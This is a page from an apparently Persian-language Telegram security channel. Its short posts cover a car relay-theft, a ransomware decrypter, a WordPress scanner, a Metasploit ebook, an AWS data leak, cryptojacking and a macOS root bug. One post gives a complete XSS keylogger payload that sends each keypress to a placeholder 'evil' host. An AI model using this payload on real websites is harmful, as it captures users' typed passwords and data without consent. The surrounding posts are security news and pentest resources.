امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
هکرها مرسدس بنز را بدون داشتن سوئیچ دزدیدند!

ادامه در پست بعدی...

@sec_nerd
امنیت اطلاعات
هکرها مرسدس بنز را بدون داشتن سوئیچ دزدیدند! ادامه در پست بعدی... @sec_nerd
در این ویدئو دو نفر که دو باکس به همراه دارند موفق میشوند بدون داشتن سوئیچ، مرسدس بنز را از جلوی خانه مالک آن سرقت کنند.
در این روش فردی به جلوی پنجره یا در خانه مالک خودرو میرود تا سیگنال های سوئیچ را دریافت کند، سپس فرد دوم سیگنالهای دریافتی از سوئیچ را با اعمال تغییراتی به سیستم موجود در خودرو منتقل کرده و درب خودرو بدون هیچ گونه آلارمی باز میشود.

این اتفاق در تاریخ ۲۴ سپتامبر رخ داده و هنوز خودروی سرقت شده توسط پلیس یافت نشده است.
در ماه آپریل نیز یک بی ام و ایکس ۵ به روشی مشابه توسط دو فرد که در کیف خود باکس های رله حمل میکردند به سرقت رفت.

https://www.hackread.com/gone-seconds-hackers-steal-mercedes-car-without-key/


#car
#RF

@sec_nerd
رمزگشایی فایلهای باج افزار با پسوند fucku.

https://download.bleepingcomputer.com/demonslay335/hc6Decrypter.zip

#ransomware
#decrypt

@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
این هم روش جدید بروت فورس ریموت دسکتاپ با دستکاری برنامه رابط!

#bruteforce
#rdp
#vnc

@sec_nerd
کشف باگ در افزونه های وردپرس با WPSploit

https://github.com/m4ll0k/WPSploit

#wordpress
#web
#pentest

@sec_nerd
کتاب آموزش metasploit برای علاقمندان (زبان اصلی)

https://drive.google.com/file/d/0B-hV1HrMP8j1R3lvTXNCTzNsck0/edit

#msf
#pentest
#ebook

@sec_nerd
باز هم باکت محافظت نشده سرور ابری آمازون باعث نشر اطلاعات محرمانه NSA شد.

https://bit.ly/2ileM7S

#nsa
#aws

@sec_nerd
فرهنگ لغات

#HUMINT جمع آوری اطلاعات از افراد بصورت میدانی
#GEOINT جمع آوری اطلاعات از ماهواره ها، عکس و نقشه
#MASINT جمع آوری اندازه ها و اثرات
#OSINT جمع آوری اطلاعات از منابع متن باز
#SIGINT جمع آوری اطلاعات از طریق امواج و سیگنالها
#TECHINT جمع آوری اطلاعات از سلاحها و تجهیزات جنگی کشورهای دیگر
#CYBINT اطلاعات جمع آوری شده از فضای سایبری
#FININT جمع آوری اطلاعات از آنالیز تجاری و تبادلات مالی


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
روش جدید استفاده از coinhive، حتی با بستن مرورگر هم کار ادامه پیدا میکند‌(با مخفی کردن یک پاپ آپ زیر تسک بار!)

https://bit.ly/2AjHt9A

#chrome #cryptojacking #monero

@sec_nerd
نمودار ارزش دلار در برابر بیت کوین از سال 2013 تاکنون!

#btc

@sec_nerd
ایجاد دسترسی روت بصورت ریموت با استفاده از باگ موجود در سیستم عامل Mac High Sierra

https://bit.ly/2ipMIA0

#macos
#root
#apple

@sec_nerd
XSS Keylogger:

<img src=x onerror='document.onkeypress=function(e){fetch("//evil?k="+String.fromCharCode(e.which))},this.remove();'>

#XSS

@sec_nerd
اگر ....
محدودیت سرعت و پهنای باند بجای خود باقیست و محدودیت بازدید از وبسایتهای خارجی با تخصیص یک سوم حجم به ترافیک خارجی هم اضافه شد!
while(true) {load('bmi.ir');}

#iran
@sec_nerd